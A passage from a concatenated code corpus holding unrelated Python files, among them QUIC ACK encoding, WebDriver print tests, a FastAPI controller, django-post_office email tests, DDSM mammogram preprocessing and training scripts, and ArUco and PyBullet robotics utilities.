rangeset.add(end - ack_count, end + 1)
end -= ack_count
return rangeset, delay
def push_ack_frame(buf: Buffer, rangeset: RangeSet, delay: int) -> int:
ranges = len(rangeset)
index = ranges - 1
r = rangeset[index]
buf.push_uint_var(r.stop - 1)
buf.push_uint_var(delay)
buf.push_uint_var(index)
buf.push_uint_var(r.stop - 1 - r.start)
start = r.start
while index > 0:
index -= 1
r = rangeset[index]
buf.push_uint_var(start - r.stop - 1)
buf.push_uint_var(r.stop - r.start - 1)
start = r.start
return ranges
```
#### File: wave/data/session.py
```python
from __future__ import absolute_import
from __future__ import unicode_literals
from ..testing.test_loader import MANUAL, AUTOMATIC
PAUSED = "paused"
RUNNING = "running"
COMPLETED = "completed"
ABORTED = "aborted"
PENDING = "pending"
UNKNOWN = "unknown"
class Session(object):
def __init__(
self,
token=None,
types=None,
user_agent=None,
labels=None,
tests=None,
pending_tests=None,
running_tests=None,
timeouts=None,
status=None,
test_state=None,
last_completed_test=None,
recent_completed_count=None,
date_started=None,
date_finished=None,
is_public=None,
reference_tokens=None,
browser=None,
webhook_urls=None,
expiration_date=None,
malfunctioning_tests=None
):
if token is None:
token = ""
self.token = token
if types is None:
types = [AUTOMATIC, MANUAL]
self.types = types
if user_agent is None:
user_agent = ""
self.user_agent = user_agent
if labels is None:
labels = []
self.labels = labels
if tests is None:
tests = {}
self.tests = tests
if pending_tests is None:
pending_tests = {}
self.pending_tests = pending_tests
if running_tests is None:
running_tests = {}
self.running_tests = running_tests
if timeouts is None:
timeouts = {}
self.timeouts = timeouts
if status is None:
status = UNKNOWN
self.status = status
if test_state is None:
test_state = {}
self.test_state = test_state
self.last_completed_test = last_completed_test
if recent_completed_count is None:
recent_completed_count = 0
self.recent_completed_count = recent_completed_count
self.date_started = date_started
self.date_finished = date_finished
if is_public is None:
is_public = False
self.is_public = is_public
if reference_tokens is None:
reference_tokens = []
self.reference_tokens = reference_tokens
self.browser = browser
if webhook_urls is None:
webhook_urls = []
self.webhook_urls = webhook_urls
self.expiration_date = expiration_date
if malfunctioning_tests is None:
malfunctioning_tests = []
self.malfunctioning_tests = malfunctioning_tests
```
#### File: tests/print/printcmd.py
```python
import base64
import pytest
import six
from tests.support.asserts import assert_error, assert_success
def decodebytes(s):
return base64.decodebytes(six.ensure_binary(s))
def do_print(session, options):
return session.transport.send(
"POST", "session/{session_id}/print".format(**vars(session)),
options)
def assert_pdf(data):
assert data.startswith(b"%PDF-"), "Decoded data starts with the PDF signature"
assert data.endswith(b"%%EOF\n"), "Decoded data ends with the EOF flag"
def test_no_top_browsing_context(session, closed_window):
response = do_print(session, {})
assert_error(response, "no such window")
def test_no_browsing_context(session, closed_frame):
response = do_print(session, {})
value = assert_success(response)
pdf = decodebytes(value)
assert_pdf(pdf)
def test_html_document(session, inline):
session.url = inline("Test")
response = do_print(session, {
"page": {"width": 10,
"height": 20},
"shrinkToFit": False
})
value = assert_success(response)
pdf = decodebytes(value)
# TODO: Test that the output is reasonable
assert_pdf(pdf)
@pytest.mark.parametrize("options", [{"orientation": 0},
{"orientation": "foo"},
{"scale": "1"},
{"scale": 3},
{"scale": 0.01},
{"margin": {"top": "1"}},
{"margin": {"bottom": -1}},
{"page": {"height": False}},
{"shrinkToFit": "false"}])
def test_invalid(session, options):
response = do_print(session, options)
assert_error(response, "invalid argument")
```
#### File: websockets/handlers/protocol_wsh.py
```python
from mod_pywebsocket import msgutil, util
def web_socket_do_extra_handshake(request):
request.ws_protocol = request.headers_in.get('sec-websocket-protocol')
#pass
def web_socket_transfer_data(request):
while True:
msgutil.send_message(request, request.ws_protocol)
return
``` |
{
"source": "JimmyWuMadchester/CoinMarketCapBacktesting",
"score": 3
} |
#### File: CoinMarketCapBacktesting/TestingStageEnvWin/coinbacktesting_bt.py
```python
import coinrepo
import bt
def main():
'''entry point'''
# Get Test Data with all fields
symbol_list = ['BTC', 'ETH']
history = coinrepo.get_coinhistory(symbol_list)
history = history.set_index('Date')
# Pivot to have only price as timeseries
pricehistory = history.pivot(columns='Symbol')['Price']
# Create the strategy
s = bt.Strategy('s1', [bt.algos.RunMonthly(),
bt.algos.SelectAll(),
bt.algos.WeighEqually(),
bt.algos.Rebalance()])
# create a backtest and run it
test = bt.Backtest(s, pricehistory)
res = bt.run(test)
res.display()
# Save figures
plot = pricehistory.plot(figsize=(15,5))
fig = plot.get_figure()
fig.savefig("price.png")
plot1 = res.plot_weights(figsize=(15,5))
fig1 = plot1.get_figure()
fig1.savefig("bt_rest.png")
# # Test bt framework installed properly
# data = bt.get('aapl,msft,c,gs,ge', start='2010-01-01')
# print data.head()
if __name__ == "__main__":
main()
``` |
{
"source": "JimmyWuMadchester/CoinPlayGround",
"score": 3
} |
#### File: JimmyWuMadchester/CoinPlayGround/test.py
```python
import helpers
import sqlserver_test
def main():
'''entry point'''
df_coinsymbols = sqlserver_test.get_allcoinsymbols()
for symbol in df_coinsymbols['symbol']:
print symbol
history_json = helpers.get_full_history(symbol)
df_history = helpers.get_df_full_history_usd(history_json)
tuples = [tuple(x) for x in df_history.values]
for row in tuples:
sqlserver_test.set_coin_history(row)
if __name__ == "__main__":
main()
``` |
{
"source": "Jimmy-Xu/fastapi_demo",
"score": 2
} |
#### File: app/controller/org.py
```python
from fastapi import APIRouter, Depends
from fastapi_plus.schema.base import ListArgsSchema, RespListSchema, RespIdSchema, RespBaseSchema
from fastapi_plus.utils.auth import get_auth_data
from fastapi_plus.utils.custom_route import CustomRoute
from ..schema.org import OrgInfoSchema, OrgRespDetailSchema
from ..service.org import OrgService
router = APIRouter(route_class=CustomRoute)
@router.post('/list', response_model=RespListSchema)
async def list(*, args: ListArgsSchema, auth_data: dict = Depends(get_auth_data)):
"""
读取组织数据列表
:param args: 请求参数集
:return: 组织列表结构
"""
args.user_id = auth_data.get('user_id')
return OrgService(auth_data).list(args)
@router.get('/{id}', response_model=OrgRespDetailSchema)
async def read(id: int, auth_data: dict = Depends(get_auth_data)):
"""
读取组织数据详情
:param id: 组织id
:return: 组织详情结构
"""
resp = OrgRespDetailSchema()
resp.detail = OrgService(auth_data).read(id)
return resp
@router.post('', response_model=RespIdSchema, response_model_exclude_none=True)
async def create(*, info: OrgInfoSchema, auth_data: dict = Depends(get_auth_data)):
"""
创建组织数据
:param info: 组织数据
:return:
"""
return OrgService(auth_data).create(info)
@router.put('/{id}', response_model=RespBaseSchema)
async def update(*, info: OrgInfoSchema, auth_data: dict = Depends(get_auth_data)):
"""
修改组织数据
:param info: 组织数据
:return:
"""
return OrgService(auth_data).update(info)
@router.delete("/{id}", response_model=RespBaseSchema)
async def delete(id: int, auth_data: dict = Depends(get_auth_data)):
"""
删除组织数据
:param id: 组织id
:return:
"""
return OrgService(auth_data).delete(id)
``` |
{
"source": "jimmyye/django-post_office",
"score": 2
} |
#### File: post_office/tests/test_html_email.py
```python
import os
from email.mime.image import MIMEImage
from django.core.mail import EmailMultiAlternatives
from django.core.mail.message import SafeMIMEMultipart, SafeMIMEText
from django.core.files.images import ImageFile
from django.template.loader import get_template
from django.test import TestCase
from django.test.utils import override_settings
from post_office.models import Email, EmailTemplate, STATUS
from post_office.template import render_to_string
from post_office.template.backends.post_office import PostOfficeTemplates
from post_office.mail import send, send_queued
class HTMLMailTest(TestCase):
def test_text(self):
template = get_template('hello.html', using='post_office')
self.assertIsInstance(template.backend, PostOfficeTemplates)
context = {'foo': "Bar"}
content = template.render(context)
self.assertHTMLEqual(content, '<h1>Bar</h1>')
def test_html(self):
template = get_template('image.html', using='post_office')
body = template.render({'imgsrc': 'dummy.png'})
self.assertHTMLEqual(body, """
<h3>Testing image attachments</h3>
<img src="cid:f5c66340b8af7dc946cd25d84fdf8c90" width="200" />
""")
subject = "[Django Post-Office unit tests] attached image"
msg = EmailMultiAlternatives(subject, body, to=['<EMAIL>'])
template.attach_related(msg)
msg.content_subtype = 'html'
self.assertEqual(msg.mixed_subtype, 'related')
# this message can be send by email
parts = msg.message().walk()
part = next(parts)
self.assertIsInstance(part, SafeMIMEMultipart)
part = next(parts)
self.assertIsInstance(part, SafeMIMEText)
self.assertHTMLEqual(part.get_payload(), body)
part = next(parts)
self.assertIsInstance(part, MIMEImage)
self.assertEqual(part.get_content_type(), 'image/png')
self.assertEqual(part['Content-Disposition'], 'inline; filename="f5c66340b8af7dc946cd25d84fdf8c90"')
self.assertEqual(part.get_content_disposition(), 'inline')
self.assertEqual(part.get_filename(), 'f5c66340b8af7dc946cd25d84fdf8c90')
self.assertEqual(part['Content-ID'], '<f5c66340b8af7dc946cd25d84fdf8c90>')
def test_mixed(self):
body = "Testing mixed text and html attachments"
html, attached_images = render_to_string('image.html', {'imgsrc': 'dummy.png'}, using='post_office')
subject = "[django-SHOP unit tests] attached image"
msg = EmailMultiAlternatives(subject, body, to=['<EMAIL>'])
msg.attach_alternative(html, 'text/html')
for attachment in attached_images:
msg.attach(attachment)
msg.mixed_subtype = 'related'
# this message can be send by email
parts = msg.message().walk()
part = next(parts)
self.assertIsInstance(part, SafeMIMEMultipart)
part = next(parts)
self.assertIsInstance(part, SafeMIMEMultipart)
part = next(parts)
self.assertIsInstance(part, SafeMIMEText)
self.assertEqual(part.get_content_type(), 'text/plain')
self.assertHTMLEqual(part.get_payload(), body)
part = next(parts)
self.assertIsInstance(part, SafeMIMEText)
self.assertEqual(part.get_content_type(), 'text/html')
self.assertHTMLEqual(part.get_payload(), html)
part = next(parts)
self.assertIsInstance(part, MIMEImage)
self.assertEqual(part.get_content_type(), 'image/png')
def test_image(self):
relfilename = 'static/dummy.png'
filename = os.path.join(os.path.dirname(__file__), relfilename)
imagefile = ImageFile(open(filename, 'rb'), name=relfilename)
template = get_template('image.html', using='post_office')
body = template.render({'imgsrc': imagefile})
self.assertHTMLEqual(body, """
<h3>Testing image attachments</h3>
<img src="cid:f5c66340b8af7dc946cd25d84fdf8c90" width="200" />
""")
subject = "[Django Post-Office unit tests] attached image"
msg = EmailMultiAlternatives(subject, body, to=['<EMAIL>'])
template.attach_related(msg)
# this message can be send by email
parts = msg.message().walk()
part = next(parts)
self.assertIsInstance(part, SafeMIMEMultipart)
part = next(parts)
self.assertIsInstance(part, SafeMIMEText)
self.assertEqual(part.get_payload(), body)
part = next(parts)
self.assertIsInstance(part, MIMEImage)
self.assertEqual(part.get_content_type(), 'image/png')
self.assertEqual(part['Content-Disposition'], 'inline; filename="f5c66340b8af7dc946cd25d84fdf8c90"')
self.assertEqual(part.get_content_disposition(), 'inline')
self.assertEqual(part.get_filename(), 'f5c66340b8af7dc946cd25d84fdf8c90')
self.assertEqual(part['Content-ID'], '<f5c66340b8af7dc946cd25d84fdf8c90>')
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend', POST_OFFICE={
'BACKENDS': {'locmem': 'django.core.mail.backends.locmem.EmailBackend'},
'TEMPLATE_ENGINE': 'post_office',
})
def test_send_with_html_template(self):
template = EmailTemplate.objects.create(
name="Test Inlined Images",
subject="[django-SHOP unit tests] attached image",
html_content="""
{% load post_office %}
<h3>Testing image attachments</h3>
<img src="{% inline_image imgsrc %}" width="200" />"""
)
filename = os.path.join(os.path.dirname(__file__), 'static/dummy.png')
context = {'imgsrc': filename}
queued_mail = send(recipients=['<EMAIL>'], sender='<EMAIL>',
template=template, context=context, render_on_delivery=True)
queued_mail = Email.objects.get(id=queued_mail.id)
send_queued()
self.assertEqual(Email.objects.get(id=queued_mail.id).status, STATUS.sent)
``` |
{
"source": "jimmyyhwu/ddsm-visual-primitives",
"score": 3
} |
#### File: data/preprocessing/preprocess_ddsm_patch_images.py
```python
import numpy as np
import pandas as pd
import sys
import os
import random
import glob
import fnmatch
import dicom
import scipy.misc
from joblib import Parallel, delayed
import multiprocessing
# It resizes the img to a size given by the tuple resize. It preserves
# the aspect ratio of the initial img and pads the remaining pixels with
# black background.
def resize_image(img, resize, interp_method='bicubic'):
# Check which dimension of the input img needs larger scaling down and
# define the size of the ouput image accordingly
if(float(img.shape[0])/resize[0]>float(img.shape[1])/resize[1]):
new_h = resize[0]
new_w = int(np.floor(float(resize[0])*img.shape[1]/img.shape[0]))
else:
new_w = resize[1]
new_h = int(np.floor(float(resize[1])*img.shape[0]/img.shape[1]))
# Create a numpy array with size equal to resize and full of black background
new_img = np.zeros(resize)
# Set the upper corner of the image equal to the resized image
if len(img.shape) == 2:
new_img[0:new_h,0:new_w] = scipy.misc.imresize(img,(new_h,new_w),interp_method)
else:
new_img[0:new_h,0:new_w] = scipy.misc.imresize(img,(new_h,new_w),interp_method)[0:new_h,0:new_w,0]
return new_img
def read_in_one_image(im_name, resize, interp_method='bicubic', normalize=True):
try:
type = im_name.split('.')[-1].lower()
# Check if it is a dicom image
if(type=='dcm'):
dicom_content = dicom.read_file(im_name)
img = dicom_content.pixel_array
# Otherwise if it is jpg just read
else:
img = scipy.misc.imread(im_name)
img = resize_image(img, resize, interp_method)
# Normalize image
img = img.astype(np.float32)
if normalize:
img -= np.mean(img)
img /= np.std(img)
# check that img is in shape (n,m,3)
if len(img.shape) == 2:
img = np.repeat(img[:,:,np.newaxis], 3, axis=2)
img[0,0,0] = 0
img[0,0,1] = 1
img[0,0,2] = 2
return img
except IOError, e:
print 'Could not open image file for {}'.format(self)
return []
# Transforms the input name into an output name for where to save the processed
# image
def get_output_name(im_name, output_dir, output_img_type):
basename = os.path.basename(im_name)
pre, ext = os.path.splitext(basename)
png_name = pre+'.'+output_img_type
return os.path.join(output_dir,png_name)
if __name__ == '__main__':
# Folder containing input patch images (images should not be organized into
# subdirectories)
input_dir = sys.argv[1]
# Folder for target png images
output_dir = sys.argv[2]
# Type of input images
input_img_type = sys.argv[3]
# Type of output images
output_img_type = sys.argv[4]
# Size to which each image should be resized
height = int(sys.argv[5])
width = int(sys.argv[6])
# Interpolation ?
interp = sys.argv[7] or 'bilinear'
# Normalize Image (z-score) ?
norm = sys.argv[8] or False
def read_and_save(im_name):
out_name = get_output_name(im_name,output_dir,output_img_type)
scipy.misc.imsave(out_name, read_in_one_image(im_name,(height,width)))
print "Saved {}".format(out_name)
num_cores = multiprocessing.cpu_count()
inputs = Parallel(n_jobs = num_cores)(
delayed(read_and_save)(im) for im in
glob.iglob(os.path.join(input_dir,"*.{}".format(input_img_type))))
```
#### File: data/preprocessing/save_ddsm_patch_datasets.py
```python
import os, sys
import mammogram
import dataloader
from joblib import Parallel, delayed
import multiprocessing
# Should parallelism be used in executing this script?
use_parallelism = True
# Folder with DDSM jpg files organized into subfolders by type
# (e.g., cancers, normals, benigns, ...)
ddsm_jpg_dir = os.path.join('/data','ddsm','raw')
# Folder with DDSM overlay files organized into subfolders by type
# (e.g., cancers, normals, benigns, ...)
ddsm_overlay_dir = os.path.join('/data','ddsm','overlays')
# Folder to which patch datasets will be saved
ddsm_patch_dir = os.path.join('/data','ddsm','patches','raw')
# Should patch images be saved?
save_images = True
# Which extension should be used for saved images
extension = 'jpg'
# Which labels should be generated? (See mammogram.get_patch_label())
label_names = ['breast_pct',
'patch_pct-any','patch_pct-mass','patch_pct-calc',
'lesion_pct-any','lesion_pct-mass','lesion_pct-calc',
'patch_pct-any-malignant','patch_pct-mass-malignant',
'patch_pct-calc-malignant',
'lesion_pct-any-malignant','lesion_pct-mass-malignant',
'lesion_pct-calc-malignant',
'patch_pct-any-3','patch_pct-mass-3','patch_pct-calc-3',
'lesion_pct-any-3','lesion_pct-mass-3','lesion_pct-calc-3',
'patch_pct-any-4','patch_pct-mass-4','patch_pct-calc-4',
'lesion_pct-any-4','lesion_pct-mass-4','lesion_pct-calc-4',
'patch_pct-any-5','patch_pct-mass-5','patch_pct-calc-5',
'lesion_pct-any-5','lesion_pct-mass-5','lesion_pct-calc-5']
# Specify patch dataset settings as a series of parallel arrays.
# The i-th entry of each array corresponds to the i-th dataset generated.
# Tile width and height as fraction of image width and height
img_fracs = [0.5, 0.25, 0.125]
# What fraction of minimum patch dimension used as stride
stride_fracs = [0.5, 0.5, 0.5]
# Load DDSM exams from specified folders
types = ['cancers','benigns','benign_without_callbacks','normals']
exams = dataloader.ddsm_load_data(ddsm_jpg_dir,ddsm_overlay_dir,types=types)
# Generate patch images and labels associated with each scan
# in each exam
def save_exam_patches(exam):
for scan in exam.scans:
scan.save_patch_datasets(ddsm_patch_dir, img_fracs, stride_fracs,
label_names, save_images,
extension)
num_cores = multiprocessing.cpu_count() if use_parallelism else 1
Parallel(n_jobs = num_cores)(delayed(save_exam_patches)(exam) for exam in exams)
```
#### File: ddsm-visual-primitives/server/cache_patch_labels.py
```python
import argparse
import os
import pickle
def process_line(line):
image_name, label = line.strip().split(' ')
label = int(label)
return image_name, label
parser = argparse.ArgumentParser()
parser.add_argument('--labels_path', default='../data/ddsm_2class/val.txt')
parser.add_argument('--output_dir', default='data/labels/')
parser.add_argument('--output_file', default='val.pickle')
args = parser.parse_args()
with open(args.labels_path, 'r') as f:
image_list = map(process_line, f.readlines())
cache = {}
for image_path, label in image_list:
_, image_name = os.path.split(image_path)
cache[image_name] = label
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
with open(os.path.join(args.output_dir, args.output_file), 'wb') as f:
pickle.dump(cache, f)
```
#### File: ddsm-visual-primitives/training/train_2class.py
```python
import argparse
import os
import time
from datetime import datetime
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torchnet
import torchvision.models as models
import torchvision.transforms as transforms
import yaml
from munch import Munch
from tensorboardX import SummaryWriter
from torch.autograd import Variable
import datasets
# pytorch 1.0 and torchvision 0.1.9
import torchvision
assert '0.1.9' in torchvision.__file__
# https://discuss.pytorch.org/t/inception3-runtimeerror-the-expanded-size-of-the-tensor-3-must-match-the-existing-size-864-at-non-singleton-dimension-3/32090
from inception import inception_v3
models.__dict__['inception_v3'] = inception_v3
def accuracy(output, target):
pred = output.max(1)[1]
return 100.0 * target.eq(pred).float().mean()
def save_checkpoint(checkpoint_dir, state, epoch):
file_path = os.path.join(checkpoint_dir, 'checkpoint_{:08d}.pth.tar'.format(epoch))
torch.save(state, file_path)
return file_path
def adjust_learning_rate(optimizer, epoch):
lr = cfg.optimizer.lr
for e in cfg.optimizer.lr_decay_epochs:
if epoch >= e:
lr *= 0.1
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def train(train_loader, model, criterion, optimizer, epoch):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
accuracies = AverageMeter()
auc = torchnet.meter.AUCMeter()
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
data_time.update(time.time() - end)
target = target.cuda(non_blocking=True)
output = model(input)
loss = criterion(output, target)
acc = accuracy(output, target)
losses.update(loss.item(), input.size(0))
accuracies.update(acc, input.size(0))
prob = nn.Softmax(dim=1)(output.detach())[:, 1].cpu().numpy()
auc.add(prob, target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_time.update(time.time() - end)
end = time.time()
if i % cfg.training.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Accuracy {accuracy.val:.4f} ({accuracy.avg:.4f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, accuracy=accuracies))
return batch_time.avg, data_time.avg, losses.avg, accuracies.avg, auc.value()[0]
def validate(val_loader, model, criterion):
batch_time = AverageMeter()
losses = AverageMeter()
accuracies = AverageMeter()
auc = torchnet.meter.AUCMeter()
model.eval()
end = time.time()
with torch.no_grad():
for i, (input, target) in enumerate(val_loader):
target = target.cuda(non_blocking=True)
output = model(input)
loss = criterion(output, target)
acc = accuracy(output, target)
losses.update(loss.item(), input.size(0))
accuracies.update(acc, input.size(0))
prob = nn.Softmax(dim=1)(output)[:, 1].cpu().numpy()
auc.add(prob, target)
batch_time.update(time.time() - end)
end = time.time()
if i % cfg.training.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Accuracy {accuracy.val:.4f} ({accuracy.avg:.4f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses, accuracy=accuracies))
return batch_time.avg, losses.avg, accuracies.avg, auc.value()[0]
def main(cfg):
if cfg.training.resume is not None:
log_dir = cfg.training.log_dir
checkpoint_dir = os.path.dirname(cfg.training.resume)
else:
timestamp = datetime.now().strftime('%Y-%m-%d_%H-%M-%S.%f')
log_dir = os.path.join(cfg.training.logs_dir, '{}_{}'.format(timestamp, cfg.training.experiment_name))
checkpoint_dir = os.path.join(cfg.training.checkpoints_dir, '{}_{}'.format(timestamp, cfg.training.experiment_name))
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
print('log_dir: {}'.format(log_dir))
print('checkpoint_dir: {}'.format(checkpoint_dir))
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
print("=> creating model '{}'".format(cfg.arch.model))
model = models.__dict__[cfg.arch.model](pretrained=cfg.arch.pretrained)
if cfg.arch.model.startswith('alexnet') or cfg.arch.model.startswith('vgg'):
model.classifier._modules['6'] = nn.Linear(4096, cfg.arch.num_classes)
elif cfg.arch.model == 'inception_v3':
model.aux_logits = False
model.fc = nn.Linear(2048, cfg.arch.num_classes)
elif cfg.arch.model == 'resnet152':
model.fc = nn.Linear(2048, cfg.arch.num_classes)
else:
raise Exception
if cfg.arch.model.startswith('alexnet') or cfg.arch.model.startswith('vgg'):
model.features = torch.nn.DataParallel(model.features)
model.cuda()
else:
model = torch.nn.DataParallel(model).cuda()
cudnn.benchmark = True
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.SGD(model.parameters(),
lr=cfg.optimizer.lr,
momentum=cfg.optimizer.momentum,
weight_decay=cfg.optimizer.weight_decay)
start_epoch = 0
if cfg.training.resume is not None:
if os.path.isfile(cfg.training.resume):
print("=> loading checkpoint '{}'".format(cfg.training.resume))
checkpoint = torch.load(cfg.training.resume)
start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})".format(cfg.training.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(cfg.training.resume))
print('')
raise Exception
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
train_transforms = []
val_transforms = []
if cfg.arch.model == 'inception_v3':
train_transforms.append(transforms.Scale(299))
val_transforms.append(transforms.Scale(299))
train_dataset = datasets.DDSM(cfg.data.root, 'train', transforms.Compose(train_transforms + [
transforms.ToTensor(),
normalize,
]))
val_dataset = datasets.DDSM(cfg.data.root, 'val', transforms.Compose(val_transforms + [
transforms.ToTensor(),
normalize,
]))
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=cfg.data.batch_size, shuffle=True,
num_workers=cfg.data.workers, pin_memory=True)
val_loader = torch.utils.data.DataLoader(
val_dataset, batch_size=cfg.data.batch_size, shuffle=False,
num_workers=cfg.data.workers, pin_memory=True)
train_summary_writer = SummaryWriter(log_dir=os.path.join(log_dir, 'train'))
val_summary_writer = SummaryWriter(log_dir=os.path.join(log_dir, 'val'))
for epoch in range(start_epoch, cfg.training.epochs):
lr = adjust_learning_rate(optimizer, epoch)
train_summary_writer.add_scalar('learning_rate', lr, epoch + 1)
train_batch_time, train_data_time, train_loss, train_accuracy, train_auc = train(
train_loader, model, criterion, optimizer, epoch)
train_summary_writer.add_scalar('batch_time', train_batch_time, epoch + 1)
train_summary_writer.add_scalar('loss', train_loss, epoch + 1)
train_summary_writer.add_scalar('accuracy', train_accuracy, epoch + 1)
train_summary_writer.add_scalar('auc', train_auc, epoch + 1)
val_batch_time, val_loss, val_accuracy, val_auc = validate(
val_loader, model, criterion)
val_summary_writer.add_scalar('batch_time', val_batch_time, epoch + 1)
val_summary_writer.add_scalar('loss', val_loss, epoch + 1)
val_summary_writer.add_scalar('accuracy', val_accuracy, epoch + 1)
val_summary_writer.add_scalar('auc', val_auc, epoch + 1)
if (epoch + 1) % cfg.training.checkpoint_epochs == 0:
checkpoint_path = save_checkpoint(checkpoint_dir, {
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'optimizer' : optimizer.state_dict(),
}, epoch + 1)
cfg.training.log_dir = log_dir
cfg.training.resume = checkpoint_path
with open(os.path.join(log_dir, 'config.yml'), 'w') as f:
f.write(cfg.toYAML())
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('config_path', metavar='PATH', help='path to config file')
args = parser.parse_args()
config_path = args.config_path
with open(config_path, 'r') as f:
cfg = Munch.fromYAML(f)
main(cfg)
``` |
{
"source": "jimmyyhwu/spatial-action-maps",
"score": 2
} |
#### File: spatial-action-maps/aruco/utils.py
```python
from pathlib import Path
import cv2
import usb.core
################################################################################
# Board and markers
def get_marker_parameters():
params = {}
params['dict_id'] = cv2.aruco.DICT_4X4_50
params['marker_length'] = 0.018 # 18 mm
params['marker_length_pixels'] = 6
params['pixels_per_mm'] = 2 # 2 gives much better marker detections than 1
params['sticker_length_mm'] = {'robots': 25, 'cubes': 28, 'corners': 24}
return params
def get_charuco_board_parameters():
params = get_marker_parameters()
params['squares_x'] = 10
params['squares_y'] = 7
params['square_length'] = 0.024 # 24 mm
square_length_pixels = (params['marker_length_pixels'] / params['marker_length']) * params['square_length']
assert not square_length_pixels - int(square_length_pixels) > 1e-8
params['square_length_pixels'] = int(square_length_pixels)
return params
def get_paper_parameters(orientation='P'):
width, height, padding = 8.5, 11, 0.5
if orientation == 'L':
width, height = height, width
params = {}
params['mm_per_in'] = 25.4
params['width_mm'] = width * params['mm_per_in']
params['height_mm'] = height * params['mm_per_in']
params['padding_mm'] = padding * params['mm_per_in']
params['ppi'] = 600
return params
def get_marker_ids(marker_type):
if marker_type == 'robots':
return list(range(10))
if marker_type == 'cubes':
return list(range(10, 34))
if marker_type == 'corners_robots':
return list(range(42, 46))
if marker_type == 'corners_cubes':
return list(range(46, 50))
if marker_type == 'corners':
return get_marker_ids('corners_robots') + get_marker_ids('corners_cubes')
raise Exception
################################################################################
# Camera
def get_video_cap(frame_width, frame_height, camera_id=0):
cap = cv2.VideoCapture(camera_id)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, frame_width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, frame_height)
cap.set(cv2.CAP_PROP_AUTOFOCUS, 0) # Might not actually do anything on macOS
cap.set(cv2.CAP_PROP_BUFFERSIZE, 1) # Reduces latency
assert cap.get(cv2.CAP_PROP_FRAME_WIDTH) == frame_width, (cap.get(cv2.CAP_PROP_FRAME_WIDTH), frame_width)
assert cap.get(cv2.CAP_PROP_FRAME_HEIGHT) == frame_height, (cap.get(cv2.CAP_PROP_FRAME_HEIGHT), frame_height)
return cap
def get_usb_device_serial(camera_name):
if camera_name == 'logitech-c930e':
id_vendor, id_product = (0x046d, 0x0843)
else:
raise Exception
dev = usb.core.find(idVendor=id_vendor, idProduct=id_product)
return usb.util.get_string(dev, dev.iSerialNumber)
def get_camera_identifier(camera_name):
try:
return get_usb_device_serial(camera_name)
except:
return 'unknown-camera'
def get_camera_params_file_path(camera_name='logitech-c930e'):
camera_params_dir = Path('camera-params')
identifier = get_camera_identifier(camera_name)
return str(camera_params_dir / '{}.yml'.format(identifier))
def get_camera_params(camera_params_file_path):
assert Path(camera_params_file_path).exists()
fs = cv2.FileStorage(camera_params_file_path, cv2.FILE_STORAGE_READ)
image_width = fs.getNode('image_width').real()
image_height = fs.getNode('image_height').real()
camera_matrix = fs.getNode('camera_matrix').mat()
dist_coeffs = fs.getNode('distortion_coefficients').mat()
fs.release()
return image_width, image_height, camera_matrix, dist_coeffs
```
#### File: jimmyyhwu/spatial-action-maps/environment.py
```python
import pprint
import tempfile
from pathlib import Path
import numpy as np
import pybullet as p
from scipy.ndimage import rotate as rotate_image
from scipy.ndimage.morphology import distance_transform_edt
from shapely.geometry import box
from shapely.ops import unary_union
from skimage.draw import line
from skimage.measure import approximate_polygon
from skimage.morphology import binary_dilation
from skimage.morphology.selem import disk
import spfa
# Room, walls, and objects
GLOBAL_SCALING = 0.1
ROBOT_HALF_WIDTH = 0.03
ROBOT_RADIUS = (ROBOT_HALF_WIDTH**2 + 0.0565**2)**0.5
ROBOT_HEIGHT = 0.07
CUBE_WIDTH = 0.044
CUBE_MASS = 0.01
CUBE_COLOR = (237.0 / 255, 201.0 / 255, 72.0 / 255, 1)
WALL_HEIGHT = 0.1
WALL_THICKNESS = 1.4
RECEPTACLE_WIDTH = 0.15
RECEPTACLE_COLOR = (1, 87.0 / 255, 89.0 / 255, 1)
ROUNDED_CORNER_WIDTH = 0.1006834873
OBSTACLE_COLOR = (0.9, 0.9, 0.9, 1)
DEBUG_LINE_COLOR = (78.0 / 255, 121.0 / 255, 167.0 / 255)
# Movement
MOVE_STEP_SIZE = 0.005 # 5 mm
TURN_STEP_SIZE = np.radians(15) # 15 degrees
MOVEMENT_MAX_FORCE = 10
NOT_MOVING_THRESHOLD = 0.0005 # 0.5 mm
NOT_TURNING_THRESHOLD = np.radians(1) # 1 degree
NONMOVEMENT_DIST_THRESHOLD = 0.005
NONMOVEMENT_TURN_THRESHOLD = np.radians(1)
STEP_LIMIT = 800
# Camera
CAMERA_HEIGHT = ROBOT_HEIGHT
CAMERA_PITCH = -30
CAMERA_FOV = 60
